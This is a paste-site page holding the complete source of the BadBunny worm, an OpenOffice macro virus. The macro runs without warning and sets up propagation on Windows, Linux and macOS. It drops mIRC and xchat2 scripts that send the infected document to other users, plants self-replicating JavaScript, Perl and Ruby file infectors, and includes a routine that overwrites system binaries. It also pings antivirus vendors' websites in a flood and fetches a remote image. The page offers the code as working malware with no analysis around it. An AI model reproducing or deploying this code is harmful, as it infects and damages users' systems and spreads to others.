Advertisement
FlyFar

Virus.Ruby.Badbunny.a - Source Code

Jun 26th, 2023
1,948
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Ruby 11.29 KB | Cybersecurity | 0 0
  1. Dim Url As String
  2. Dim myFileProp as Object
  3.  
  4. Sub badbunny()
  5. rem Ooo.BadBunny by Necronomikon&Wargame from [D00mRiderz]
  6. Dim mEventProps(1) as new com.sun.star.beans.PropertyValue
  7. mEventProps(0).Name = "EventType"
  8. mEventProps(0).Value = "StarBasic"
  9. mEventProps(1).Name = "Script"
  10. mEventProps(1).Value = "macro://ThisComponent/Standard.badbunny.startgame"
  11. com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
  12. ThisComponent.LockControllers
  13. oDocument = ThisComponent
  14. otext=oDocument.text
  15. ocursor=otext.createtextcursor()
  16. otext.insertString(ocursor, "BadBunny(c)by Necronomikon[DR],Skyout,Wargame[DR]",false)
  17. url=converttourl("http://www.gratisweb.com/badbunny/badbunny.jpg")
  18. oDocument = StarDesktop.loadComponentFromURL(url, "_blank", 0, myFileProp() )
  19. msgbox "Hey " +Chr(31)+environ("username") +Chr(31)+ " you like my BadBunny?", 32,"///BadBunny\\\"
  20. call ping
  21. end sub
  22.  
  23. sub startgame
  24. if GetGUIType =1 then 'windows
  25. call win
  26. end if
  27. if GetGUIType =3 then 'MacOS
  28. call mac
  29. end if
  30. if GetGUIType =4 then 'linux
  31. call lin
  32. end if
  33. end sub
  34.  
  35. sub win
  36. Dim dirz As String
  37. Dim dummy()
  38. Dim iVar As Integer
  39. Dim Args(0) as new com.sun.star.beans.PropertyValue
  40. Args(0).Name = "MacroExecutionMode"
  41. Args(0).Value = _
  42. com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
  43. ThisComponent.LockControllers
  44.   datei="c:\badbunny.odg"
  45.   dateiurl=converttourl(datei)
  46.   odoc=thisComponent
  47.   odoc.storeasurl(dateiurl,dummy())
  48. dirz=Environ ("programfiles")
  49.  
  50. Open "c:\drop.bad" For Output As #1
  51. Print #1, "[script]"
  52. Print #1, "n0=; IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"
  53. Print #1, "n1=/titlebar *#*#*#*#*#*( Not every Bunny is friendly... )*#*#*#*#*#*#*"
  54. Print #1, "n2=on 1:start:{"
  55. Print #1, "n3=  /if $day == Friday { /echo  }"
  56. Print #1, "n4=on 1:Join:#:if $chan = #virus /part $chan"
  57. Print #1, "n5=on 1:connect:.msg Necronomikon -=I am infected with ur stuff!!!=-"
  58. Print #1, "n6=on 1:connect:.msg wargame -=I am infected with ur stuff!!!=-"
  59. Print #1, "n7=on 1:text:#:*hi*:/say $chan kick me"
  60. Print #1, "n8=on 1:text:#:*hello*:/say $chan kick me"    
  61. Print #1, "n9=on 1:part:#:{"
  62. Print #1, "n10=set %M_E $me"
  63. Print #1, "n11=set %NickName $nick"
  64. Print #1, "n12=set %ccd .dcc"
  65. Print #1, "n13=  if %NickName != %M_E {"
  66. Print #1, "n14=    /q %NickName lets do it like a rabbit...;)"
  67. Print #1, "n15=    /msg %NickName Be my bunny!"
  68. Print #1, "n16=%ccd send -c %NickName c:\badbunny.odg"
  69. Print #1, "n17=  }"
  70. Print #1, "n18=}"
  71. Close #1
  72.  
  73. if ( Dir(dirz &"\mirc") <> "") then
  74. Filecopy "c:\drop.bad" ,  dirz &"\mirc\script.ini"
  75. end if
  76. if ( Dir("c:\mirc") <> "") then
  77. Filecopy "c:\drop.bad" ,  "c:\mirc\script.ini"
  78.  
  79. end if
  80. if ( Dir(dirz &"\mirc32") <> "") then
  81. Filecopy "c:\drop.bad" ,  dirz &"\mirc32\script.ini"
  82. end if
  83. if ( Dir("c:\mirc32") <> "") then
  84. Filecopy "c:\drop.bad" ,  "c:\mirc32\script.ini"
  85. end if
  86.  
  87. Open "c:\badbunny.js" For Output As #2
  88. Print #2, "// BadBunny"
  89. Print #2, "var FSO=WScript.CreateObject(unescape(""%53"")+unescape(""%63"")+unescape(""%72"")+unescape(""%69"")+unescape(""%50"")+unescape(""%74"")+unescape(""%69"")+""n""+unescape(""%67"")+"".""+unescape(""%46"")+unescape(""%69"")+""l""+unescape(""%65"")+unescape(""%53"")+unescape(""%79"")+unescape(""%73"")+unescape(""%74"")+unescape(""%65"")+""mO""+unescape(""%62"")+""j""+unescape(""%65"")+unescape(""%63"")+unescape(""%74""))"
  90. Print #2, "var me=FSO.OpenTextFile(WScript.ScriptFullName,1)"
  91. Print #2, "var OurCode=me.Read(1759)"
  92. Print #2, "me.Close()"
  93. Print #2, "nl=String.fromCharCode(13,10); code=''; count=0; fcode=''"
  94. Print #2, "file=FSO.OpenTextFile(WScript.ScriptFullName).ReadAll()"
  95. Print #2, "for (i=0; i < file.length; i++) { check=0; if (file.charAt(i)==String.fromCharCode(123) && Math.round(Math.random()*3)==1) { foundit(); check=1 } if (!check) { code+=file.charAt(i) } }"
  96. Print #2, "FSO.OpenTextFile(WScript.ScriptFullName,2).Write(code+fcode)"
  97. Print #2, "var jsphile=new Enumerator(FSO.GetFolder(""."").Files)"
  98. Print #2, "for(;!jsphile.atEnd();jsphile.moveNext())"
  99. Print #2, "{"
  100. Print #2, "if(FSO.GetExtensionName(jsphile.item()).toUpperCase()==""JS"")"
  101. Print #2, "{"
  102. Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,1)"
  103. Print #2, "var Marker=filez.Read(11)"
  104. Print #2, "var allinone=Marker+filez.ReadAll()"
  105. Print #2, "filez.Close()"
  106. Print #2, "if(Marker!=""// BadBunny"")"
  107. Print #2, "{"
  108. Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,2)"
  109. Print #2, "filez.Write(OurCode+allinone)"
  110. Print #2, "filez.Close()"
  111. Print #2, "}"
  112. Print #2, "}"
  113. Print #2, "}"
  114. Print #2, "function foundit()"
  115. Print #2, "{"
  116. Print #2, "fcodea=''; count=0; randon='';"
  117. Print #2, "for (j=i; j < file.length; j++) { if (file.charAt(j)==String.fromCharCode(123)) { count++; } if (file.charAt(j)==String.fromCharCode(125)) { count--; } if (!count) { fcodea=file.substring(i+1,j); j=file.length; } }"
  118. Print #2, "for (j=0; j < Math.round(Math.random()*5)+4; j++) { randon+=String.fromCharCode(Math.round(Math.random()*25)+97) }"
  119. Print #2, "fcode+=nl+nl+'function '+randon+'()'+nl+String.fromCharCode(123)+nl+fcodea+nl+String.fromCharCode(125)"
  120. Print #2, "code+=String.fromCharCode(123)+' '+randon+'() '"
  121. Print #2, "i+=fcodea.length;"
  122. Print #2, "}"
  123. Print #2, "//->"
  124. Close #2
  125. Shell("c:\badbunny.js",0)
  126. oDoc.store()
  127. End Sub
  128.  
  129. sub lin()
  130. 'xchat2worm part by WarGame
  131. dim HomeDir as string
  132. dim xchat2script as string
  133. dim perlvir as string
  134. dim cmd as string
  135. dim WgeT as string
  136. Dim dummy()
  137. Dim iVar As Integer
  138. Dim Args(0) as new com.sun.star.beans.PropertyValue
  139. Args(0).Name = "MacroExecutionMode"
  140. Args(0).Value = _
  141. com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
  142. ThisComponent.LockControllers
  143.   datei="/tmp/badbunny.odg"
  144.   dateiurl=converttourl(datei)
  145.   odoc=thisComponent
  146.   odoc.storeasurl(dateiurl,dummy())
  147.  
  148. ' get home dir
  149. HomeDir = Environ("HOME")
  150.  
  151. 'build the path of our xchat2 script
  152. if HomeDir = "" then
  153. ' I could not get $HOME !
  154.  
  155. else
  156. xchat2script = HomeDir & "/.xchat2/badbunny.py"
  157.  
  158. ' drop the python script
  159. Open xchat2script For Output As #1
  160. print #1,"__module_name__ = "+Chr(34)+"IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"+Chr(34)
  161. print #1,"__module_version__ = "+Chr(34)+"0.1"+Chr(34)
  162. print #1,"__module_description__ = "+Chr(34)+"xchat2 IRC_Worm for BadBunny"+Chr(34)
  163. print #1,"import xchat"
  164. print #1,"def onkick_cb(word, word_eol, userdata):"
  165. print #1,"  if xchat.nickcmp(word[3],xchat.get_info("+Chr(34)+"nick"+Chr(34)+")) != 0:"
  166. print #1,"      xchat.command("+Chr(34)+"DCC SEND "+Chr(34)+"+ word[3] +"+Chr(34)+" /tmp/badbunny.odg"+Chr(34)+")"
  167. print #1,"  return xchat.EAT_NONE"
  168. print #1,"xchat.hook_server("+Chr(34)+"KICK"+Chr(34)+", onkick_cb)"
  169. close #1
  170. endif
  171.  
  172. 'drop the perl virus
  173. perlvir = HomeDir & "/BadBunny.pl"
  174. open perlvir for output as #1
  175. print #1,"#BadBunny"
  176. print #1,"open(File,$0);@MyCode = ;close(File);"
  177. print #1,"foreach $FileName (<*>){open(File,$FileName);$chk = 1;while(){"
  178. print #1,"if($_ =~ /#BadBunny/){$chk = 0;}}close(File);if($chk eq 1){"
  179. print #1,"open(File,"+Chr(34)+">$FileName"+Chr(34)+");print File @MyCode;close(File);}}"
  180. close #1
  181. cmd = "perl " & perlvir
  182. shell(cmd,0)
  183.  
  184. oDoc.store()
  185. end sub
  186.  
  187. sub mac()
  188. Dim iVar As Integer
  189. iVar = Int((15 * Rnd) -2)
  190. Select Case iVar
  191. Case 1 To 5
  192. call one
  193. Case 6, 7, 8
  194. call two
  195. Case Is > 8 And iVar < 11
  196. call one
  197. Case Else
  198. call two
  199. End Select
  200. end sub
  201.  
  202. sub one ()
  203. 'thx to skyout
  204. Open "badbunny.rb" For Output As #1
  205. print #1,"#!/usr/bin/env ruby"
  206. print #1,"require 'ftools'"
  207. print #1,"def replacecmd(cmdname, dirpath)"
  208. print #1,"File.move(""#{dirpath}/#{cmdname}"", ""#{dirpath}/#{cmdname}_"")"
  209. print #1,"oldcmd   = File.open(""#{dirpath}/#{cmdname}"", File::WRONLY|File::TRUNC|File::CREAT, 0777)"
  210. print #1,"oldcmd.puts ""#!/usr/bin/env ruby\n"""
  211. print #1,"oldcmd.puts ""puts \""\"""
  212. print #1,"oldcmd.puts ""puts \""\\t\\tYour system has been infected with:\"""""
  213. print #1,"oldcmd.puts ""puts \""\\t\\t>>>> Dropper for BadBunny"""""
  214. print #1,"oldcmd.puts ""puts \""\\t\\t>>>> by SkyOut"""
  215. print #1,"oldcmd.puts ""puts \""\"""""
  216. print #1,"oldcmd.puts ""puts \""Take a moment of patience ...\"""""
  217. print #1,"oldcmd.puts ""puts \""Executing in ...\"""""
  218. print #1,"oldcmd.puts ""sleep 1"""
  219. print #1,"oldcmd.puts ""puts \""3\"""
  220. print #1,"oldcmd.puts ""sleep 1"""
  221. print #1,"oldcmd.puts ""puts \""2\"""
  222. print #1,"oldcmd.puts ""sleep 1"""
  223. print #1,"oldcmd.puts ""puts \""1\"""
  224. print #1,"oldcmd.puts ""sleep 1"""
  225. print #1,"oldcmd.puts ""puts \""\"""
  226. print #1,"oldcmd.puts ""for $args in $* do"""
  227. print #1,"oldcmd.puts ""$argslist = \""#\{$argslist\}\"" + \"" \"" + \""#\{$args\}\"""
  228. print #1,"oldcmd.puts ""end"""
  229. print #1,"oldcmd.puts ""exec \""#{dirpath}/#{cmdname}_ #\{$argslist\}\"""
  230. print #1,"oldcmd.puts ""exit 0"""
  231. print #1,"end"
  232. print #1,"$binary_dirs = Array.new"
  233. print #1,"$binary_dirs = [ ""/bin"", ""/usr/bin"", ""/usr/local/bin"", ""/sbin"", ""/usr/sbin"", ""/usr/local/sbin"" ]"
  234. print #1,"for $dir in $binary_dirs do"
  235. print #1,"if File.directory?($dir) then"
  236. print #1,"if File.writable?($dir) then"
  237. print #1,"Dir.open($dir).each do |file|"
  238. print #1,"next if file =~ /^\S+_/ || file == ""."" || file == "".."""
  239. print #1,"replacecmd(file, $dir)"
  240. print #1,"end"
  241. print #1,"end"
  242. print #1,"end"
  243. print #1,"end"
  244. print #1,"exit 0"
  245. close #1
  246. Shell("badbunny.rb",0)
  247. end sub
  248.  
  249. sub two() 'thx to SPTH for this...
  250. Open "badbunnya.rb" For Output As #2
  251. print #2,"# BADB"
  252. print #2,"mycode="""
  253. print #2,"mych=File.open(__FILE__)"
  254. print #2,"myc=mych.read(1)"
  255. print #2,"while myc!=nil"
  256. print #2,"mycode+=myc"
  257. print #2,"myc=mych.read(1)"
  258. print #2,"end"
  259. print #2,"mycode=mycode[mycode.length-734,734]"
  260. print #2,"cdir = Dir.open(Dir.getwd)"
  261. print #2,"cdir.each do |a|"
  262. print #2,"if File.ftype(a)==""file"" then"
  263. print #2,"if a[a.length-3, a.length]=="".rb"" then"
  264. print #2,"if a!=File.basename(__FILE__) then"
  265. print #2,"fcode="""
  266. print #2,"fle=open(a)"
  267. print #2,"badb=fle.read(1)"
  268. print #2,"while badb!=nil"
  269. print #2,"fcode+=badb"
  270. print #2,"badb=fle.read(1)"
  271. print #2,"end"
  272. print #2,"fle.close"
  273. print #2,"if fcode[fcode.length-732,4]!=""BADB"" then"
  274. print #2,"fcode=fcode+13.chr+10.chr+mycode"
  275. print #2,"fle=open(a,""w"")"
  276. print #2,"fle.print fcode"
  277. print #2,"fle.close"
  278. print #2,"end"
  279. print #2,"end"
  280. print #2,"end"
  281. print #2,"end"
  282. print #2,"end"
  283. print #2,"cdir.close"
  284. close #2
  285. Shell("badbunnya.rb",0)
  286. End Sub
  287.  
  288. sub ping()
  289. Shell("ping -l 5000 -t www.ikarus.at",0)
  290. Shell("ping -l 5000 -t www.aladdin.com",0)
  291. Shell("ping -l 5000 -t www.norman.no",0)
  292. Shell("ping -l 5000 -t www.norman.com",0)
  293. Shell("ping -l 5000 -t www.kaspersky.com",0)
  294. Shell("ping -l 5000 -t www.kaspersky.ru",0)
  295. Shell("ping -l 5000 -t www.kaspersky.pl",0)
  296. Shell("ping -l 5000 -t www.grisoft.cz",0)
  297. Shell("ping -l 5000 -t www.symantec.com",0)
  298. Shell("ping -l 5000 -t www.proantivirus.com",0)
  299. Shell("ping -l 5000 -t www.f-secure.com",0)
  300. Shell("ping -l 5000 -t www.sophos.com",0)
  301. Shell("ping -l 5000 -t www.arcabit.pl",0)
  302. Shell("ping -l 5000 -t www.arcabit.com",0)
  303. Shell("ping -l 5000 -t www.avira.com",0)
  304. Shell("ping -l 5000 -t www.avira.de",0)
  305. Shell("ping -l 5000 -t www.avira.ro",0)
  306. Shell("ping -l 5000 -t www.avast.com",0)
  307. Shell("ping -l 5000 -t www.virusbuster.hu",0)
  308. Shell("ping -l 5000 -t www.trendmicro.com",0)
  309. Shell("ping -l 5000 -t www.bitdefender.com",0)
  310. Shell("ping -l 5000 -t www.pandasoftware.comm",0)
  311. Shell("ping -l 5000 -t www.drweb.com",0)
  312. Shell("ping -l 5000 -t www.drweb.ru",0)
  313. Shell("ping -l 5000 -t www.viruslist.com",0)
  314. end sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement